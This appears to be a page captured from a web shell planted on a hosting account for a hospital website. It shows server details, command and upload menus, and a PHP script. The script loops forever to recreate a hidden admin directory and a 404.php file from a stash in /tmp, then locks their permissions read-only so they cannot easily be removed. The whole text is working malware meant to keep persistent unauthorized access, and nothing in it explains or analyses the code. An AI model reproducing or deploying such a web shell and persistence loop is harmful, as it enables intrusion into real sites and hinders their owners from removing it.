|
Server IP : 82.197.83.136 / Your IP : 216.73.217.81 Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u163988420 ( 163988420) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0500) : /home/../proc/1001107/fd/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
@ini_set("max_execution_time", 0);
while (True){
if (!file_exists("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin")){
mkdir("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin");
}
if (!file_exists("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin/404.php")){
$text = base64_encode(file_get_contents("/tmp/.sessions/.L2hvbWUvdTE2Mzk4ODQyMC9kb21haW5zL2Jyc2hhc3RyaWhvc3BpdGFsLmNvbS9wdWJsaWNfaHRtbC9BQUNTSVRFL2JyLWFkbWluNDA0LXRleHQ="));
file_put_contents("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin/404.php", base64_decode($text));
}
if (haxorsec_perm("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin/404.php") != 0444){
chmod("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin/404.php", 0444);
}
if (haxorsec_perm("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin") != 0555){
chmod("/home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/br-admin", 0555);
}
}
function haxorsec_perm($flename){
return substr(sprintf("%o", fileperms($flename)), -4);
}